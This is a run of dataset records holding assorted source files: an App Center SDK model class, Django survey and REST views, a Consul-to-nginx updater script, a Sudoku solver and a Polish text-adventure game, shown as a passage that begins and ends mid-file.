E501\n\n :return: The live_update_package_hash of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._live_update_package_hash\n\n @live_update_package_hash.setter\n def live_update_package_hash(self, live_update_package_hash):\n \"\"\"Sets the live_update_package_hash of this LogFlowDevice.\n\n Hash of all files (ReactNative or Cordova) deployed to device via LiveUpdate beacon. Helps identify the Release version on device or need to download updates in future.\n # noqa: E501\n\n :param live_update_package_hash: The live_update_package_hash of this LogFlowDevice. # noqa: E501\n :type: string\n \"\"\"\n\n self._live_update_package_hash = live_update_package_hash\n\n @property\n def wrapper_runtime_version(self):\n \"\"\"Gets the wrapper_runtime_version of this LogFlowDevice. # noqa: E501\n\n Version of the wrapper technology framework (Xamarin runtime version or ReactNative or Cordova etc...). See wrapper_sdk_name to see if this version refers to Xamarin or ReactNative or other.\n # noqa: E501\n\n :return: The wrapper_runtime_version of this LogFlowDevice. # noqa: E501\n :rtype: string\n \"\"\"\n return self._wrapper_runtime_version\n\n @wrapper_runtime_version.setter\n def wrapper_runtime_version(self, wrapper_runtime_version):\n \"\"\"Sets the wrapper_runtime_version of this LogFlowDevice.\n\n Version of the wrapper technology framework (Xamarin runtime version or ReactNative or Cordova etc...). See wrapper_sdk_name to see if this version refers to Xamarin or ReactNative or other.\n # noqa: E501\n\n :param wrapper_runtime_version: The wrapper_runtime_version of this LogFlowDevice. 
# noqa: E501\n :type: string\n \"\"\"\n\n self._wrapper_runtime_version = wrapper_runtime_version\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, LogFlowDevice):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"sdks/python/appcenter_sdk/models/LogFlowDevice.py","file_name":"LogFlowDevice.py","file_ext":"py","file_size_in_byte":25828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"485618364","text":"# -*- coding: utf-8 -*-\n\"\"\"\n/dms/survey/utils.py\n\n.. enthaelt Hilfefunktionen fuer das E-Mail-Formular\n Django content Management System\n\nHans Rauch\nhans.rauch@gmx.net\n\nDie Programme des dms-Systems koennen frei genutzt und den spezifischen\nBeduerfnissen entsprechend angepasst werden.\n\n0.01 17.01.2008 Beginn der Arbeit\n0.02 19.01.2008 get_admin_options\n\"\"\"\n\nimport string\nimport xml.dom.minidom\n\nfrom django.template.loader import get_template\nfrom django.template import Context\n\nfrom django.utils.translation import ugettext as _\n\nfrom dms.queries import get_site_url\n\n# -----------------------------------------------------\ndef get_admin_options(item_container, user_perms):\n \"\"\" Personen mit manager-Rechten koennen bestimmte Optionen auswaehlen \"\"\"\n if not user_perms.perm_manage:\n return ''\n from django.template.loader import get_template\n from django.template import Context\n tSection = get_template('app/survey/admin_options.html')\n if item_container.item.integer_2:\n reset_option = False\n else:\n reset_option = True\n cSection = Context ({ 'path': get_site_url(item_container, ''), 'reset_option': reset_option})\n content = tSection.render ( cSection)\n return content\n\n# -----------------------------------------------------\ndef get_form_tab_row(item_container, user, user_org, inputs, texts):\n \"\"\" baut eine Eingabeelement zusammen \"\"\"\n input = text = ''\n for i in inputs:\n if i.question_id == item_container.item.id:\n if item_container.item.string_1 == 'checkbox':\n if input != '':\n input += '\\n'\n input += i.value\n else:\n input = i.value\n break\n for t in texts:\n if t.question_id == item_container.item.id:\n text = t.value\n\n if user.is_authenticated() and user_org != None:\n name = item_container.item.name[:-5] # .html abschneiden\n if name=='sex':\n if user.sex == _(u'm'):\n default = _(u'Herr')\n elif user.sex == _(u'w'):\n default = _(u'Frau')\n else:\n default = ''\n elif name=='first_name':\n default = user.first_name\n elif name=='last_name':\n default = user.last_name\n elif 
name=='title':\n default = user.title\n elif name=='email':\n default = user.email\n elif name=='username':\n default = user.username\n elif name=='organisation':\n default = user_org.organisation\n elif name=='sub_organisation':\n default = user_org.sub_organisation\n elif name=='street':\n default = user_org.street\n elif name=='zip':\n default = user_org.zip\n elif name=='town':\n default = user_org.town\n elif name=='phone':\n default = user_org.phone\n elif name=='fax':\n default = user_org.fax\n elif name=='homepage':\n default = user_org.homepage\n elif input != '':\n default = input\n elif text != '':\n default = text\n else:\n default = item_container.item.text_more\n else:\n default = item_container.item.text_more\n if item_container.item.string_1 == 'input':\n t_form = get_template('app/survey/input.html')\n context = Context ( { 'header': item_container.item.title,\n 'info': item_container.item.sub_title,\n 'maxlength': item_container.item.integer_2,\n 'size': item_container.item.integer_3,\n 'default': default,\n 'required': item_container.item.integer_1,\n 'name': item_container.item.id } )\n elif item_container.item.string_1 == 'text':\n t_form = get_template('app/survey/text.html')\n context = Context ( { 'header': item_container.item.title, \n 'info': item_container.item.sub_title,\n 'default': default,\n 'cols': item_container.item.integer_4,\n 'rows': item_container.item.integer_5,\n 'required': item_container.item.integer_1,\n 'name': item_container.item.id } )\n elif item_container.item.string_1 in ['radio', 'checkbox']:\n if item_container.item.string_1 == 'radio':\n t_form = get_template('app/survey/radio.html')\n else:\n t_form = get_template('app/survey/checkbox.html')\n keys = string.splitfields(item_container.item.text.strip().replace('
\\r\\n','').replace('\\r
',''), '\\n')\n options = []\n defaults = string.splitfields(default, '\\n')\n for key in keys:\n key = key.strip()\n if key != '':\n if key in defaults:\n options.append( {'name': key, 'checked': True, } )\n else:\n options.append( {'name': key, } )\n context = Context ( { 'header': item_container.item.title,\n 'info': item_container.item.sub_title,\n 'options': options,\n 'required': item_container.item.integer_1,\n 'name': item_container.item.id } )\n return t_form.render(context)\n\n","sub_path":"survey/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"223783695","text":"#!/usr/bin python2.6.6\r\n# coding: utf-8\r\n'''\r\nAuthor : xiaoxuanzi (xiaoximou@gmail.com)\r\n\r\n'''\r\nimport urllib2\r\nimport sys\r\n\r\nimport config\r\nimport consul\r\nimport genlog\r\nlogger = genlog.Filelogger\r\n\r\nUPSTREAM_PREFIX = config.UPSTREAM_PREFIX\r\nSERVICE_PREFIX = config.SERVICE_PREFIX\r\nSERVICE = config.SERVICE\r\n\r\nclass UpdateNginxError( Exception ): pass\r\nclass UpdateNginx( object ):\r\n\r\n def __init__(self, ngx_name, upst_name, upst_info):\r\n\r\n self.ngx_name = ngx_name\r\n self.upst_name = upst_name\r\n self.upst_info = upst_info\r\n\r\n self.ips = config.NGINX[ngx_name]['ips']\r\n self.port = config.NGINX[ngx_name]['port']\r\n\r\n def _update(self, ip, port, data):\r\n\r\n uri = ''.join([\"http://\",ip,\":\",port,\"/upstream/\",self.upst_name])\r\n is_ok = False\r\n\r\n try:\r\n req = urllib2.Request(uri, data.encode('utf-8'))\r\n rep = urllib2.urlopen(req)\r\n ret = rep.read()\r\n ret = eval(ret)\r\n\r\n if ret['status'] == 200:\r\n is_ok = True\r\n\r\n except Exception as e:\r\n logger.warn(repr(e))\r\n is_ok = False\r\n\r\n return is_ok\r\n\r\n def update(self):\r\n\r\n port = str(self.port)\r\n tries = config.TRIES\r\n data = self.upst_info\r\n\r\n for ip in self.ips:\r\n msg = 'ip:{0} upstream:{1} nginx:{2}'.format(ip, self.upst_name, self.ngx_name)\r\n for i in xrange(0, tries):\r\n\r\n if self._update(ip, port, data):\r\n logger.info('UpdateNginx Success! {0}'.format(msg) )\r\n break\r\n else:\r\n logger.warn('UpdateNginx Failed! 
{0}'.format(msg))\r\n #raise UpdateNginxError(err_msg)\r\n\r\ndef run():\r\n\r\n try:\r\n key = sys.argv[1]\r\n c = consul.Consul()\r\n value = c.get(key)\r\n\r\n upst_name = key[len(UPSTREAM_PREFIX):]\r\n ngx_name = key[len(SERVICE_PREFIX):len(SERVICE_PREFIX) + len(SERVICE)]\r\n\r\n #print(upst_name, ' : ', ngx_name)\r\n ngx = UpdateNginx(ngx_name, upst_name, value)\r\n ngx.update()\r\n\r\n except Exception as e:\r\n logger.warn('ngx_name:{0} upst_name:{1} err:{2}'.format(ngx_name,upst_name,repr(e)))\r\n\r\nif __name__ == \"__main__\":\r\n\r\n run()\r\n","sub_path":"Python/Consul/ngx_consul.py","file_name":"ngx_consul.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"633359734","text":"# We want to define output format by ourselves by format() and string method\n\n# define __format__() in class\n\n_formats = {\n\t'ymd': '{d.year}-{d.month}-{d.day}',\n\t'mdy': '{d.month}/{d.day}/{d.year}',\n\t'dmy': '{d.day}/{d.month}/{d.year}'\n}\n\nclass Date:\n\tdef __init__(self, year, month, day):\n\t\tself.year = year\n\t\tself.month = month\n\t\tself.day = day\n\n\tdef __format__(self, code):\n\t\tif code == '':\n\t\t\tcode = 'ymd'\n\t\tfmt = _formats[code]\n\t\treturn fmt.format(d=self)\n\n# test\n\nd = Date(2016, 5, 18)\nprint (format(d))\nprint (format(d, 'mdy'))\nprint ('The date is {:ymd}'.format(d))\nprint ('The date is {:mdy}'.format(d))\n\n","sub_path":"8_class_object/2_define_string_output_format/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"273321579","text":"\nimport random\n\nfrom django.shortcuts import get_object_or_404\nfrom django.contrib.auth import get_user_model\n\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.decorators import api_view\n\nfrom post.models import RecommendMusic, SearchMusic\n\nfrom drf_yasg.utils import swagger_auto_schema\n\nfrom .serializers import *\nfrom post.serializers import RecommandMusicSerializer, SearchMusicSerializer\n\n\nUser = get_user_model()\n\n\nclass UserDetailView(APIView):\n \n def get_object(self, user_id):\n return get_object_or_404(User, pk=user_id)\n \n def get(self, request, user_id):\n user = self.get_object(user_id)\n serializer = UserSerializer(instance=user)\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n def patch(self, request, user_id):\n user = self.get_object(user_id)\n serializer = UserSerializer(instance=user, data=request.data)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n def delete(self, request, user_id):\n user = self.get_object(user_id)\n user.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\n@swagger_auto_schema(methods=['post'], request_body=CheckEmailSerializer)\n@api_view(['POST'])\ndef check_email(request):\n email = request.data.get('email', None)\n exist = User.objects.filter(email=email).exists()\n if exist:\n state = status.HTTP_200_OK\n else:\n state = status.HTTP_204_NO_CONTENT\n \n return Response(status=state)\n\n\nclass MusicView(APIView):\n\n @swagger_auto_schema()\n def get(self, request):\n recommend_music = request.user.recommend_like.all()\n search_music = request.user.search_like.all()\n\n result = []\n\n recommend_music_serializer = 
LikeMusicSerializer(instance=recommend_music, many=True)\n search_music_serializer = LikeMusicSerializer(instance=search_music, many=True)\n \n for music in recommend_music_serializer.data:\n music = dict(music)\n music['liked'] = True\n result.append(music)\n \n for music in search_music_serializer.data:\n music = dict(music)\n music['liked'] = True\n result.append(music)\n\n random.shuffle(result)\n\n return Response(result, status=status.HTTP_200_OK)\n \n @swagger_auto_schema(request_body=LikeSerializer)\n def post(self, request):\n pk = request.data['music_id']\n search = request.data['search']\n \n if search:\n music = get_object_or_404(SearchMusic, pk=pk)\n\n if request.user in music.search_like_music.all():\n music.search_like_music.remove(request.user)\n msg = {\n 'detail' : '좋아요 취소' \n }\n return Response(msg, status=status.HTTP_200_OK)\n else:\n music.search_like_music.add(request.user)\n msg = {\n 'detail' : '좋아요' \n }\n return Response(msg, status=status.HTTP_200_OK)\n else:\n music = get_object_or_404(RecommendMusic, pk=pk)\n if request.user in music.recommend_like_music.all():\n music.recommend_like_music.remove(request.user)\n msg = {\n 'detail' : '좋아요 취소' \n }\n return Response(msg, status=status.HTTP_200_OK)\n else:\n music.recommend_like_music.add(request.user)\n msg = {\n 'detail' : '좋아요' \n }\n return Response(msg, status=status.HTTP_200_OK)\n\n@swagger_auto_schema()\n@api_view(['GET'])\ndef my_music(request):\n posts = request.user.posts.all()\n search_music = SearchMusic.objects.filter(user=request.user).all()\n\n result = []\n for post in posts:\n music= post.recommend_music\n if music:\n music_data = RecommandMusicSerializer(instance=music).data\n music_data['liked'] = request.user.recommend_like.filter(pk=music.id).exists()\n result.append(music_data)\n \n for music in search_music:\n music_data = SearchMusicSerializer(instance=music).data\n music_data['liked'] = request.user.search_like.filter(video_id=music.video_id).exists()\n result.append(music_data)\n \n return Response(result, status=status.HTTP_200_OK)\n","sub_path":"back/accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"317151669","text":"#Program to Solve Sudoku\r\n#Display\r\ndef Display(set):\r\n for i in set:\r\n if i == set[0]:\r\n print(\"-\"*19)\r\n rec = \"\"\r\n rec = \"|\" + \"|\".join(map(str,i)) + \"|\"\r\n print(rec)\r\n if i == set[-1]:\r\n print(\"-\"*19)\r\n if i == set[2]:\r\n print(\"-\"*19)\r\n if i == set[5]:\r\n print(\"-\"*19)\r\n#Checking Row\r\ndef RowCheck(set,row,blocked):\r\n for i in range(1,10):\r\n if i not in blocked and i in set[row]:\r\n blocked.append(i)\r\n return blocked\r\n#Checking Column\r\ndef ColumnCheck(set,column,blocked):\r\n for i in range(1,10):\r\n for j in range(0,9):\r\n if i not in blocked and i == set[j][column]:\r\n blocked.append(i)\r\n return blocked\r\n#Parameter Set\r\ndef Parameter(column,row):\r\n if column >= 0 and column < 3:\r\n if row >= 0 and row < 3:\r\n return [[0,3],[0,3]]\r\n elif row >= 3 and row < 6:\r\n return [[0,3],[3,6]]\r\n elif row >= 6 and row < 9:\r\n return [[0,3],[6,9]]\r\n elif column >= 3 and column < 6:\r\n if row >= 0 and row < 3:\r\n return [[3,6],[0,3]]\r\n elif row >= 3 and row < 6:\r\n return [[3,6],[3,6]]\r\n elif row >= 6 and row < 9:\r\n return [[3,6],[6,9]]\r\n elif column >= 6 and column < 9:\r\n if row >= 0 and row < 3:\r\n return [[6,9],[0,3]]\r\n elif row >= 3 and row < 6:\r\n 
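# right column band, middle row band -> [[6,9],[3,6]], i.e. [[col_lo, col_hi], [row_lo, row_hi]] as consumed by range() in BlockCheck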
return [[6,9],[3,6]]\r\n elif row >= 6 and row < 9:\r\n return [[6,9],[6,9]]\r\n#Block Check\r\ndef BlockCheck(set,column,row,blocked):\r\n param = Parameter(column,row)\r\n columnparam = param[0]\r\n rowparam = param[1]\r\n for k in range(1,10):\r\n for i in range(rowparam[0],rowparam[1]):\r\n for j in range(columnparam[0],columnparam[1]):\r\n if k not in blocked and k==set[i][j]:\r\n blocked.append(k)\r\n return blocked\r\n#Setting in per block\r\ndef PerBlock(set):\r\n for i in range(0,9):\r\n for j in range(0,9):\r\n if set[i][j] == 0:\r\n possible = []\r\n blocked = []\r\n blocked = RowCheck(set,i,blocked)\r\n blocked = ColumnCheck(set,j,blocked)\r\n blocked = BlockCheck(set,j,i,blocked)\r\n for k in range(1,10):\r\n if k not in blocked:\r\n possible.append(k)\r\n if len(possible) == 1:\r\n set[i][j] = possible[0]\r\n return set\r\n#Getting Sudoku from User\r\ndef GetSudoku():\r\n infoset = [[1,2,3,4,5,6,7,8,9],[10,11,12,13,14,15,16,17,18],[19,20,21,22,23,24,25,26,27],[28,29,30,31,32,33,34,35,36],[37,38,39,40,41,42,43,44,45],[46,47,48,49,50,51,52,53,54],[55,56,57,58,59,60,61,62,63],[64,65,66,67,68,69,70,71,72],[73,74,75,76,77,78,79,80,81]]\r\n print(\"Please Enter prompts as the given order:\")\r\n Display(infoset)\r\n set = [[],[],[],[],[],[],[],[],[]]\r\n n=1\r\n for i in range(0,9):\r\n for j in range(0,9):\r\n element = int(input(f\"Enter {n}:\"))\r\n set[i].append(element)\r\n n+=1\r\n return set\r\n#Function to Solve the Sudoku\r\ndef Solver(choice):\r\n if choice:\r\n set1 = [[5,3,0,0,7,0,0,0,0],[6,0,0,1,9,5,0,0,0],[0,9,8,0,0,0,0,6,0],[8,0,0,0,6,0,0,0,3],[4,0,0,8,0,3,0,0,1],[7,0,0,0,2,0,0,0,6],[0,6,0,0,0,0,2,8,0],[0,0,0,4,1,9,0,0,5],\r\n[0,0,0,0,8,0,0,7,9]]\r\n else:\r\n set1 = GetSudoku()\r\n set2 = set1\r\n print(\"Original\")\r\n Display(set1)\r\n Unfinished = True\r\n while Unfinished:\r\n set2 = PerBlock(set2)\r\n n = 0\r\n for i in set2:\r\n if 0 in i:\r\n n+=1\r\n if n == 0:\r\n Unfinished = False\r\n print(\"Solved\")\r\n Display(set2)\r\n#Function to debug the checking functions\r\ndef FunctionTest():\r\n blockt = [[0,2,3,4,5,6,7,8,9],[4,5,6],[7,8,9],[2],[3],[5],[6],[8],[9]]\r\n print(\"Original\")\r\n Display(blockt)\r\n possible = []\r\n blocked = []\r\n blocked = ColumnCheck(blockt,0,blocked)\r\n blocked = RowCheck(blockt,0,blocked)\r\n blocked = BlockCheck(blockt,0,0,blocked)\r\n for i in range(1,10):\r\n if i not in blocked:\r\n possible.append(i)\r\n if len(possible) == 1:\r\n blockt[0][0] = possible[0]\r\n print(\"Solved\")\r\n Display(blockt)\r\n print(possible)\r\n print(blocked)\r\n\r\n#Main Program\r\nchoiceTF = True\r\nwhile choiceTF:\r\n choice = input(\"Do you want to input your own Sudoku?(Y/N):\")\r\n if choice.upper() == \"Y\":\r\n choiceTF = False\r\n n = False\r\n elif choice.upper() == \"N\":\r\n n = True\r\n choiceTF = False\r\n else:\r\n print(\"Please enter a valid choice\")\r\n\r\nSolver(n)\r\n","sub_path":"sudoku.py","file_name":"sudoku.py","file_ext":"py","file_size_in_byte":4686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"319572899","text":"# -*- coding: utf-8 -*- \nimport sys \nimport json\nimport time\nimport os\nimport random\n#import lokacje\nfrom wincon import *\n\n#west = lokacje.west()\n\n# Wypisywacz tekstów\n\ndef printtekst(lib1):\n for x in lib1:\n print(x, end=\"\", flush=True)\n time.sleep(0.02)\n \ndef printtekstslow(lib1):\n for x in lib1:\n print(x, end=\"\", flush=True)\n time.sleep(0.03) \n \ndef printsay(ar1):\n set_color(BLUE)\n print(ar1, end=\"\")\n 
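# the speaker name was printed in blue just above; the ' mówi: ' ('says:') suffix follows in light red before the color is reset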
set_color(LIGHT|RED)\n print(\" mówi: \")\n set_color(None)\n\ndef menu(opcje, text):\n printtekst(text)\n while True:\n abc = sys.stdin.readline().strip()\n if abc in opcje:\n return abc\n text12 = \"hmm, coś wpisałeś nie tak.\\n\"\n printtekst(text12)\n\ndef printlok(arg1, arg2):\n set_color(GRAY)\n print(\"===============================================================================\")\n set_color(GREEN)\n print(\" Lokalizacja: %s | %s \" % (arg1, arg2))\n set_color(GRAY)\n print(\"===============================================================================\\n\")\n set_color(None)\n \ndef printopis(arg1):\n set_color(GRAY)\n print(\"===============================================================================\")\n set_color(GREEN)\n print(\" %s \" % (arg1))\n set_color(GRAY)\n print(\"===============================================================================\\n\")\n set_color(None) \n \ndef printcore(arg1):\n set_color(GRAY)\n print(\"===============================================================================\")\n set_color(GREEN)\n print(\" Lokalizacja: %s \" % (arg1))\n set_color(GRAY)\n print(\"===============================================================================\\n\")\n set_color(None) \n \n \n# Kolory dla linuxa i windowsa\ndef sleep(): \n time.sleep(0.25) \n \nif os.name == 'nt':\n import ctypes\n import struct\n RED, GREEN, BLUE = 4, 2, 1\nelse:\n RED, GREEN, BLUE = 1, 2, 4\n\nLIGHT = 8\nBROWN = RED | GREEN\nCYAN = BLUE | GREEN\nMAGENTA = RED | BLUE\nBLACK = 0\nGRAY = RED | GREEN | BLUE\n# set_color(GRAY|LIGHT) set_color(BLUE|LIGHT) set_color(BLUE) set_color(None) \n\ndef set_color(c):\n if os.name == 'nt':\n set_color_nt(c)\n elif os.name == 'posix':\n set_color_posix(c)\n\ndef set_color_posix(c):\n # http://www.xfree86.org/4.8.0/ctlseqs.html\n # https://en.wikipedia.org/wiki/ANSI_escape_code#Colors\n\n if c is None:\n # Reset koloru do domyślnego.\n sys.stdout.write(\"\\x1b[;m\")\n return\n\n intensity = 0\n if c & LIGHT:\n intensity = 1\n\n color = 30 + (c & 7)\n\n sys.stdout.write(\"\\x1b[%u;%um\" % (intensity, color))\n \n\ndef set_color_nt(c):\n # Upewnij się, że wszystko do tej pory zapisane do stdout zostało już\n # przekazane do konsoli.\n sys.stdout.flush()\n\n # Pobierz systemowy uchwyt standardowego wyjścia konsoli. \n hstdout = getattr(set_color_nt, \"hstdout\", None)\n if hstdout is None:\n STD_OUTPUT_HANDLE = 0xfffffff5\n hstdout = ctypes.windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE)\n setattr(set_color_nt, \"hstdout\", hstdout)\n\n # Pobierz obecny kolor, który będzie uznany za domyślny.\n console_info = ctypes.create_string_buffer(22)\n ctypes.windll.kernel32.GetConsoleScreenBufferInfo(\n hstdout, ctypes.byref(console_info))\n default_color = struct.unpack(\"h\", console_info[8:10])[0]\n setattr(set_color_nt, \"default_color\", default_color)\n\n # Zmień kolor.\n if c is None:\n c = getattr(set_color_nt, \"default_color\", GRAY)\n\n ctypes.windll.kernel32.SetConsoleTextAttribute(hstdout, c)\n\n# nick w grze\nwith open(\"data.json\", \"r\") as f:\n nick = json.loads(f.read())\n\n# Pierwszy kontakt z grą\ndef firststart():\n global nick \n if nick == \"\": \n print(\"Witaj! Widocznie odpaliłes pierwszy raz gre! 
Podaj nam swoj nick\") \n nick = sys.stdin.readline().strip() \n print(\"Od teraz twojim nickiem w grze będzi %s !\" % nick)\n else:\n start() \n \n\n \n\n# Zapis gry\nsave = {\n\"karczmasave\":1,\n\"ryneksave\":0,\n\"kowalsave\":0,\n\"zielarzsave\":0,\n\"katedrasave\":0\n}\n \n# Zmienne globalne\nlokalizacja = \"Sauron\"\n\n\n# Mapa\n\ndef mapa():\n print(\"Mapa Miasta \")\n \n\n\n# Lokalizacje w Dennergrave\n\nclass LocDKarczma:\n def showlocation(self):\n karczma()\n return False\n \n def core(self, cmd):\n pass\n \ndef karczma():\n cls()\n global save \n printlok(\"Dennergrave\", \"Karczma\")\n if save[\"karczmasave\"] == 0:\n printsay(\"Karczmarz\")\n text = \"Witaj! Jestem tutaj Karczmarzem, widzę Cię tu pierwszy raz więc postanowiłem \\nzapytać czy nie potrzebujesz małej pomocy w oprowadzeniu Cię po karczmie.\\n\\n1.)Witaj. Przyda mi się pare słów o tym miejscu\\n2.)Cześć. Nie dziękuje poradzę sobie.\\n\"\n printtekst(text)\n while True:\n kst = sys.stdin.readline().strip()\n if kst == \"1\": \n print(\"Witaj, z mila checia zobacze co tu sie dzieje\")\n text99 = \"Tak więc w Karczmie możesz grać z tutejszymi mieszczanami w gry o pieniądze, \\njest to łatwy sposób na zarobienie lecz można też wszystko szybko stracić. Tak \\nwięc graj rozsądnie\\n\"\n printsay(\"Karczmarz\")\n printtekst(text99)\n break \n if kst == \"2\": \n break \n else:\n print(\"Hmm coś się nie zgadza..\") \n askone = menu([\"1\",\"2\",\"3\"], \"Gdzie chcesz podejść?\\n1.)Bar (Karczmarz)\\n2.)Stolik z grą w kości\\n3.)Wyjdz\\n\")\n cls()\n printlok(\"Dennergrave\", \"Karczma\")\n if askone == \"2\":\n printsay(\"Mieszczanin\") \n textm2 = \"Witaj wojowniku! Chętny na partyjkę w kości?\\n1.)Tak\\n2.)Nie\\n\"\n printtekst(textm2)\n askkarczma1 = sys.stdin.readline().strip()\n while True: \n if askkarczma1 == \"1\":\n while True:\n text3 = \"Okej, jeżeli będziesz gotowy wpisz losuj i zaczniemy grę. Za każdą wygraną \\ndostaniesz 10 monet\\n\"\n printsay(\"Mieszczanin\")\n printtekst(text3)\n ask4 = sys.stdin.readline().strip()\n if ask4 == \"losuj\":\n mrandom = random.randint(1, 6)\n hrandom = random.randint(1, 6)\n if mrandom > hrandom:\n print(\"Wynik Mieszczanina = %d \\nMój wynik = %d\" % (mrandom, hrandom))\n text5 = \"Niesty przegrywasz\\n\"\n printtekst(text5)\n elif mrandom < hrandom:\n print(\"Wynik Mieszczanina = %d \\nMój wynik = %d\" % (mrandom, hrandom))\n text6 = \"Tym razem udało Ci się wygrać\\n\"\n printtekst(text6) \n elif mrandom == hrandom:\n print(\"Wynik Mieszczanina = %d \\nMój wynik = %d\" % (mrandom, hrandom))\n text7 = \"Remis!\\n\"\n printtekst(text7)\n printsay(\"Mieszczanin\")\n text8 = \"Gramy dalej? 
(tak, nie)\\n\"\n printtekst(text8)\n ask8 = sys.stdin.readline().strip()\n if ask8 == \"nie\":\n cls()\n return \n if askkarczma1 == \"2\":\n cls()\n return\n else: \n print(\"hmm?\")\n if askone == \"1\":\n print(\"\")\n if askone == \"3\":\n cls()\n move(LocDMiasto)\n \nclass LocDMiasto:\n def __init__(self):\n self.commands_d = {\n \"karczma\":LocDKarczma,\n \"rynek\":LocDRynek,\n }\n def showlocation(self):\n cls()\n printcore(\"Dennergrave\") \n \n def core(self, cmd):\n if cmd in self.commands_d:\n move(self.commands_d[cmd])\n return True\n return False\n \nclass LocDRynek:\n def __init__(self):\n self.MENU = {\n \"1\":LocDKarczma,\n \"2\":LocDRynek,\n \"3\":LocDRynek,\n \"4\":LocDRynek,\n \"5\":LocDRynek\n } \n def showlocation(self):\n global save\n cls()\n printlok(\"Dennergrave\", \"Rynek\")\n printtekst(\"Gdzie chcesz podejść?\\n1.)Miastowy Kupiec\\n2.)Stoisko z bronią\\n3.)Mieszczanin Lothius \\n4.)Podestał\\n5.)Wróć do Miasta\\n\")\n \n def core(self, cmd): \n if cmd not in self.MENU:\n return False\n move(self.MENU[cmd])\n return True\n \n \ndef kowal():\n cls()\n global save\n printlok(\"Dennergrave\", \"Kowal\")\n if save[\"kowalsave\"] == 0:\n text = \"\"\n printtekst(text)\n \ndef zielarz():\n cls() \n printlok(\"Dennergrave\", \"Zielarz\")\n if save[\"zielarzsave\"] == 0:\n text = \"\"\n printtekst(text)\n \ndef katedra():\n cls()\n printlok(\"Dennergrave\", \"Katedra\")\n if save[\"katedrasave\"] == 0:\n text = \"\"\n printtekst(text)\n \n \n \n \n \n# Commands\ndef ekwipunek():\n test = \"testowy item\"\n cls()\n printopis(\"Ekwipunek\") \n print(\" Wyposażenie \\u2551 Ekwipunek \")\n print(\" \\u2551 \")\n print(\" Broń: %-30s\\u2551 %-31s\" % (test, test))\n print(\" Pierścień: %-25s\\u2551 %-31s\" % (test, test))\n print(\" \\u2551 %-31s\" % test)\n print(\" Hełm: %-30s\\u2551 %-31s\" % (test, test))\n print(\" Zbroja: %-28s\\u2551 %-31s\" % (test, test))\n print(\" Spodnie: %-27s\\u2551 %-31s\" % (test, test))\n print(\" Buty: %-30s\\u2551 %-31s\" % (test, test))\n print(\" \\u2551 %-31s\" % test)\n print(\" \\u2551 %-31s\" % test)\n print(\" \\u2551 %-31s\" % test)\n print(\" \\u2551 %-31s\" % test)\n print(\" \\u2551 %-31s\" % test)\n print(\" \\u2551 %-31s\" % test)\n \n\ndef questy():\n print(\"Questy\")\n dcore() \n\ndef info():\n print(\"Lokalizacja : %s\" % lokalizacja)\n dcore2()\n \n\n \n \n# User Profile \n# SAVING CURRENT EXP! \n\nexp = 145\n\nhp = 0 \nmaxhp = 0\nattack = 0 \nmagicpower = 0 \narmor = 0 \nmagicresist = 0\n\nl_hp = 0 \nl_maxhp = 0\nl_attack = 0 \nl_magicpower = 0 \nl_armor = 0 \nl_magicresist = 0\n\nclass lvlsystem:\n global hp\n global maxhp\n global attack\n global magicpower\n global armor\n global magicresist \n\n #LVL system\n\n def lvlcheck(self):\n if exp <= 200:\n instancja.lvl = \"2\"\n self.lvl2() \n if exp <= 100:\n instancja.lvl = \"1\"\n self.lvl1() \n \n def lvl1(self):\n global l_maxhp, l_attack, l_armor, l_magicpower, l_magicresist\n l_maxhp = 10\n l_attack = 3 \n l_armor = 0\n l_magicpower = 0 \n l_magicresist = 0 \n \n def lvl2(self):\n global l_maxhp, l_attack, l_armor, l_magicpower, l_magicresist\n l_maxhp = 12\n l_attack = 4 \n l_armor = 0\n l_magicpower = 0 \n l_magicresist = 0 \n\nlvl = lvlsystem()\n\n# !!! 
